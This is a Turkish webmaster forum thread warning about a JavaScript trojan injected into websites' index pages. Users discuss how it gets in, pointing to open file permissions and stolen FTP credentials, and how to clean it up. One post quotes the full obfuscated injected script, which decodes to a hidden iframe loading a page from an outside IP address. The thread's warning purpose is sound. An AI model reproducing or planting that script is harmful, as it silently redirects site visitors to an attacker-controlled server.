rus virüsü

[draga]

arkadaşlar son günlerde ruslar sitelerin indexlerindeki body taglarının arasına java script virüsü yerleştiriyor uyarayım dedim.

kendi siteme yerleştirdiler iyi ki yedek almışım 1gün önce 2dkda hallettim


virüs adı;

Trojan- licker.HTML.IFrame.ru

dikkat edin.. yeni değil ama adamlar hızlandı

[visitistanbul]

Draga bu nasıl yapılıyor peki ??
Nasıl yerleştiriyor elin Rus'u ??

[draga]

chmod ayarları eğer 777 yani en açık verici modda olursa adamlar girip java script kodu atıyorlar. bu verdiğim virüsün sadece adı. <body></body> taglarının arasına yerleştiriyorlar. yani normal bi kod değil ör; 0458C06HJ42LLİS...... böle uzuyup giden bir kod. index.php vb. anasayfa dosyanızın chmod ayarını, mybb forumda özellikle setting.php nin chmod ayarını 644 olarak bırakmayı unutmayın. bende bi arkadaşım sayesinde öğrendim kaspersky dan girince virüs var dedi index i açıp bi baktım body tagı oluşturup atmışlar kodu. 2tane indexi düzelttim düzelmedi, sonra full yedek attım olayı hallettim. En büyük şansım dün saat 23:55 te saldırı yiyip yedek almam yoksa yine tam herşey yolunda giderken tekrar başa dönecektim

[Loi]

Genel olarak FTP programlarının içinde kayıtlı şifreleri kullanarak sunucuya bağlanıp belirli aralıklarla indexlere müdehale ediliyor. Böyle bişey başınıza gelirse FTP programında kayıtlı şifre bırakmamaya özen gösterin ayrıca FTP şifrelerinizide değiştirin.

[TaLiP]

Alıntı:

Loi´isimli üyeden Alıntı

Genel olarak FTP programlarının içinde kayıtlı şifreleri kullanarak sunucuya bağlanıp belirli aralıklarla indexlere müdehale ediliyor. Böyle bişey başınıza gelirse FTP programında kayıtlı şifre bırakmamaya özen gösterin ayrıca FTP şifrelerinizide değiştirin.

Katılıyorum başıma geldi geçtiğimiz hafta.

[Ozcan]

http://www.mavinefes.com/blog/wordpr...temasi-turkce/

bu sitede sanırım bu virüsten var kaspersky sağ olsun hemen buluyor.

http://www.antivirusprogrami.com/dow...rnet-security/ indirme adresi.

[draga]

evet çok sağolun chmodu yaptım ama yine atmışlar virüs neyse ben tekrar temiz yedeği atıp ftpde bilgi bırakmayayım.

virüs kodu bu;

Kod:

<!--
var d=document,kol=561;
function O10H487CAF74F3EBA(H487CAF7500080){  return( parseInt(H487CAF7500080,16));}function H487CAF7500C6B(H487CAF750106A){ function H487CAF7502456() {var H487CAF7502C4D=2;return H487CAF7502C4D;} var H487CAF750146D='';for(H487CAF7501C5E=0; H487CAF7501C5E<H487CAF750106A.length; H487CAF7501C5E+=H487CAF7502456()){ H487CAF750146D += ( String.fromCharCode (O10H487CAF74F3EBA(H487CAF750106A.substr(H487CAF7501C5E, H487CAF7502456()))));}return H487CAF750146D;} document.write(H487CAF7500C6B('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323334393139292B27643639386134633431355C272077696474683D363737206865696768743D333437207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->

[efekentli]

kısa süre önce benim başıma da geldi (wp) index.php chmod ayarları 777 değildi ama yine kodu yerleştirmişler. Defalarca sildim ama tekrar geri geliyordu.Temiz bir bilgisayardan ftp şifremi değiştirdim daha sonra da format Şimdi bir sorun yok.

http://forum.iyinet.com/webmaster-ge...im-lutfen.html

Bilgisayara bulaşan bir virüs ve antiler ancak siteye yerleştikten sonra uyarı veriyor. Siz kodu silseniz bile ftpden yerleştiriyorlar, o yüzden temiz bilgisayardan ftp şifresini değiştirin ve ardından bilgisayarınıza format atınız.

[blackmurder]

Çok baş belası insanlar sadece sorun çıkarıyorlar.

[mayhem]

bu nasıl bir kod böyle şifrelenmiş sanırım